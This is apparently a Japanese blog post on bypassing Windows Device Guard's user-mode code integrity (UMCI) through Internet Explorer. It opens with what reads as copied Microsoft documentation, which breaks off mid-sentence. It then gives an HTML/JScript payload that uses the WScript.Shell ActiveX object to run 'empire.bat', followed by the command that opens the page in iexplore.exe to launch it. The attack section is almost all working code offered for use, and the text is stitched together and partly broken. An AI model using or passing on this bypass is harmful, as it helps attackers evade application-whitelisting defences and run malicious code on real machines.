
Internet Explorer の UMCI 機能をバイパスする
Windows Defender Device Guard は、エンタープライズ関連のハードウェアおよびソフトウェアのセキュリティ機能を組み合わせたものであり、これらを一緒に構成すると、コード整合性ポリシーで定義した信頼できるアプリケーションのみを実行できるようにデバイスをロックダウンします。信頼されていないアプリは実行できません。基本的な要件を満たすハードウェアを使用すれば、攻撃者が Windows カーネルの制御を奪ったとしても、悪意のある実行可能コードを実行できる可能性が大幅に低くなります。適切なハードウェアを使用すると、Windows Defender Device Guard は Windows 10 の新しい仮想化ベースのセキュリティ(Enterprise および Education デスクトップ SKU とすべての Server SKU で利用可能)を利用して、コード整合性サービスを Microsoft Windows カーネル自体から分離できます。この場合、コード整合性サービスは Windows ハイパーバイザーで保護されたコンテナ内でカーネルと並行して実行されます。 このガイドでは、Windows Defender Device Guard の個々の機能と、それらの計画、構成、展開方法について説明します。これには以下が含まれます:
UMCI は、承認されていないバイナリの実行を防止し、Windows スクリプトホストを制限し、PowerShell を制約言語モードにします。これにより、システム上でコード実行を取得することはかなり困難になります。この投稿は
======================================================================||>
コードバイパスショーを始めましょう
======================================================================||>
<html>
<body>
<script type="text/jscript">
var r = new ActiveXObject("WScript.Shell").Run("empire.bat");
</script>
</body>
</html>
======================================================================||>
PS:> C:\Users\Homjxie> cmd /C "C:\Program Files\Internet Explorer\iexplore.exe " "C:\Users\Homjxie\Desktop\Homjxie.html"
======================================================================||>

======================================================================||> ======================================================================||>